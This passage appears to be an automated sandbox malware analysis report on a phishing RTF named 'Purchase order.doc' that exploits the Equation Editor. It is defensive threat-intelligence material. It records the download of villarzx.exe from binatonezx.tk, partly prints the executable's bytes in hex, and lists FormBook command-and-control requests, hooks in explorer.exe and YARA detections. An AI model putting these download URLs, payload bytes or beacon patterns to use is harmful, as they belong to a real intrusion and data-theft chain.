                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              Static File Info

                                              General

                                              File type:Rich Text Format data, unknown version
                                              Entropy (8bit):4.010742433150536
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:Purchase order.doc
                                              File size:532611
                                              MD5:b0e95a4af180627b781257494c5bd43b
                                              SHA1:a660ad6781f25a7a3ce699751495f0cb2adf7196
                                              SHA256:51d82db8f2b1b3d5387e3c400b1a3ad27371e4340343aa4affe4165d51334d90
                                              SHA512:cfca9ff89cbc1bdf2f63c47b4e6b5fdb09af813e357ca9fe07ef26cb48d3aa65cccd32ac96814b36481fe20af5d0342dfe1ed423f607c64a7f9d22954b3f321f
                                              SSDEEP:12288:Mq/DepHZjIfzrFqYq7aycaNwDTxDREZSBIihUZUz:7GpIrMvcysTpaihUez
                                              File Content Preview:{\rtf5477%..`.2[+0)^8[64'5!8~|1(0?|[641-?<?);?3%??2&|#?$?!;`?^)~_]/5)1%`6&9?.?&^.29;#;0=@?;5?.@~.-%/:?^&.[@~%.=`%~7|`%?5'<.;+%-78*7?%[*6![]|](~+-6<%2]0_9?]`|^?745.=]1[9(-.-.]@:31?3.-#@^2@_/?9&.?2%|.4??%:;7,3.?)%-#6+!?5.1!9<+|?*];&^^8<`6>)8'`$%9!7(`.#]2(3@

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static RTF Info

                                              Objects

                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                              0000018F7hno
                                              1000018BFhno

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              10/27/21-16:40:39.297759UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 27, 2021 16:39:11.693308115 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.721389055 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.721467018 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.721872091 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.752553940 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.753971100 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754014969 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754054070 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754090071 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.754093885 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754132986 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754143000 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.754153967 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.754169941 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754201889 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.754208088 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754230976 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.754247904 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754265070 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.754287958 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754323959 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.754326105 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.754342079 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.754374027 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.774081945 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782649994 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782691956 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782716036 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782740116 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782749891 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782764912 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782779932 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782783031 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782785892 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782788992 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782793045 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782820940 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782830954 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782846928 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782856941 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782872915 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782881975 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782898903 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782908916 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782928944 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782937050 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782954931 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782965899 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.782982111 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.782991886 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.783009052 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.783013105 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.783035994 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.783040047 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.783061981 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.783071041 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.783087969 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.783096075 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.783114910 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.783126116 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.783143044 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.783153057 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.783169985 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.783179998 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.783200026 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.786727905 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.810794115 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.810826063 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.810847044 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.810866117 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.810924053 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.810956001 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.813731909 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.813766003 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.813797951 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.813808918 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.813829899 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.813853979 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.813859940 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.813870907 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.813874960 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.813889980 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.813915014 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.813915968 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.813944101 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.813946009 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.813960075 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.813977957 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.814008951 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.814032078 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.814037085 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.814039946 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.814071894 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.814100027 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.814101934 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.814135075 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.814136982 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.814141035 CEST4916780192.168.2.222.56.59.211
                                              Oct 27, 2021 16:39:11.814163923 CEST80491672.56.59.211192.168.2.22
                                              Oct 27, 2021 16:39:11.814189911 CEST80491672.56.59.211192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 27, 2021 16:39:11.637491941 CEST5216753192.168.2.228.8.8.8
                                              Oct 27, 2021 16:39:11.675817966 CEST53521678.8.8.8192.168.2.22
                                              Oct 27, 2021 16:40:39.274214029 CEST5059153192.168.2.228.8.8.8
                                              Oct 27, 2021 16:40:39.297759056 CEST53505918.8.8.8192.168.2.22
                                              Oct 27, 2021 16:40:56.300431967 CEST5780553192.168.2.228.8.8.8
                                              Oct 27, 2021 16:40:56.351763010 CEST53578058.8.8.8192.168.2.22
                                              Oct 27, 2021 16:41:16.763684034 CEST5903053192.168.2.228.8.8.8
                                              Oct 27, 2021 16:41:16.787118912 CEST53590308.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Oct 27, 2021 16:39:11.637491941 CEST192.168.2.228.8.8.80xdf6cStandard query (0)binatonezx.tkA (IP address)IN (0x0001)
                                              Oct 27, 2021 16:40:39.274214029 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.filecrev.comA (IP address)IN (0x0001)
                                              Oct 27, 2021 16:40:56.300431967 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.charlotte-s-creations.comA (IP address)IN (0x0001)
                                              Oct 27, 2021 16:41:16.763684034 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.tapehitsscriptsparty.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Oct 27, 2021 16:39:11.675817966 CEST8.8.8.8192.168.2.220xdf6cNo error (0)binatonezx.tk2.56.59.211A (IP address)IN (0x0001)
                                              Oct 27, 2021 16:40:39.297759056 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.filecrev.com202.165.66.108A (IP address)IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST8.8.8.8192.168.2.220x9c63No error (0)www.charlotte-s-creations.comssl2.site123.comCNAME (Canonical name)IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST8.8.8.8192.168.2.220x9c63No error (0)ssl2.site123.comcaddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST8.8.8.8192.168.2.220x9c63No error (0)caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com54.156.84.168A (IP address)IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST8.8.8.8192.168.2.220x9c63No error (0)caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com54.145.162.195A (IP address)IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST8.8.8.8192.168.2.220x9c63No error (0)caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com3.87.84.223A (IP address)IN (0x0001)
                                              Oct 27, 2021 16:40:56.351763010 CEST8.8.8.8192.168.2.220x9c63No error (0)caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com54.157.107.32A (IP address)IN (0x0001)
                                              Oct 27, 2021 16:41:16.787118912 CEST8.8.8.8192.168.2.220x30e0Name error (3)www.tapehitsscriptsparty.comnonenoneA (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • binatonezx.tk
                                              • www.filecrev.com
                                              • www.charlotte-s-creations.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.22491672.56.59.21180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Oct 27, 2021 16:39:11.721872091 CEST0OUTGET /villarzx.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: binatonezx.tk
                                              Connection: Keep-Alive
                                              Oct 27, 2021 16:39:11.753971100 CEST2INHTTP/1.1 200 OK
                                              Date: Wed, 27 Oct 2021 14:39:11 GMT
                                              Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                              Last-Modified: Wed, 27 Oct 2021 07:18:31 GMT
                                              ETag: "82400-5cf5066baacfe"
                                              Accept-Ranges: bytes
                                              Content-Length: 533504
                                              Vary: User-Agent
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e4 a2 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 18 08 00 00 0a 00 00 00 00 00 00 0a 36 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 35 08 00 4f 00 00 00 00 40 08 00 28 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 16 08 00 00 20 00 00 00 18 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 28 06 00 00 00 40 08 00 00 08 00 00 00 1a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 02 00 00 00 22 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 35 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 b8 be 00 00 03 00 00 00 74 01 00 06 c8 7c 01 00 f0 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00 00 06 0a 2b 00 06 2a 8a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 72 01 00 00 70 7d 05 00 00 04 2a 7a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 2a 96 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 02 04 7d 03 00 00 04 2a b2 02
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxa06 @@ @5O@(` H.text `.rsrc(@@@.reloc`"@B5Ht|&(*0Hs~(~,s,(*#<0+*0s+*0sR+*0sT+*0s+*0s+*0s+*0s+*}}(rp}*z}}(}*}}(}}*


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249168202.165.66.10880C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Oct 27, 2021 16:40:39.572412968 CEST568OUTGET /jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj HTTP/1.1
                                              Host: www.filecrev.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Oct 27, 2021 16:40:40.154506922 CEST568INHTTP/1.1 404 Not Found
                                              Server: nginx/1.21.0
                                              Date: Wed, 27 Oct 2021 14:40:40 GMT
                                              Content-Type: application/json; charset=utf-8
                                              Content-Length: 181
                                              Connection: close
                                              X-Powered-By: Express
                                              ETag: W/"b5-7t+tQyc7QpflCZNr+ruKCrIOKs0"
                                              Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 61 6e 6e 6f 74 20 47 45 54 20 2f 63 6c 69 63 6b 2f 70 72 6f 78 79 6a 73 2f 6a 79 30 62 2f 3f 30 36 33 38 34 44 71 70 3d 54 79 47 44 4a 68 4c 2f 63 41 2b 35 37 77 66 75 66 61 5a 52 79 4d 4d 72 51 6b 38 75 50 64 32 64 36 4e 66 59 38 31 52 73 6a 34 36 62 5a 68 4f 4a 4c 58 67 5a 35 32 32 42 75 70 42 45 37 2b 42 71 51 73 50 38 38 51 3d 3d 26 63 74 3d 58 68 68 34 6e 4c 33 38 59 4e 76 70 6a 22 7d
                                              Data Ascii: {"statusCode":404,"error":"Not Found","message":"Cannot GET /click/proxyjs/jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj"}


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.224916954.156.84.16880C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Oct 27, 2021 16:40:56.493159056 CEST569OUTGET /jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj HTTP/1.1
                                              Host: www.charlotte-s-creations.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Oct 27, 2021 16:40:56.631287098 CEST570INHTTP/1.1 308 Permanent Redirect
                                              Connection: close
                                              Location: https://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj
                                              Server: Caddy
                                              Date: Wed, 27 Oct 2021 14:40:56 GMT
                                              Content-Length: 0


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: USER32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE5
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE5
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE5
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE5

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: WINWORD.EXE PID: 2596 Parent PID: 596

                                              General

                                              Start time:16:38:18
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f330000
                                              File size:1423704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: EQNEDT32.EXE PID: 2856 Parent PID: 596

                                              General

                                              Start time:16:38:20
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: villar8681.exe PID: 2808 Parent PID: 2856

                                              General

                                              Start time:16:38:22
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\villar8681.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\villar8681.exe
                                              Imagebase:0x1040000
                                              File size:533504 bytes
                                              MD5 hash:E78C85674617F34A2F69FFC8DA6A3C48
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 38%, ReversingLabs
                                              Reputation:low

                                              Analysis Process: villar8681.exe PID: 1312 Parent PID: 2808

                                              General

                                              Start time:16:38:26
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\villar8681.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\villar8681.exe
                                              Imagebase:0x1040000
                                              File size:533504 bytes
                                              MD5 hash:E78C85674617F34A2F69FFC8DA6A3C48
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: explorer.exe PID: 1764 Parent PID: 1312

                                              General

                                              Start time:16:38:28
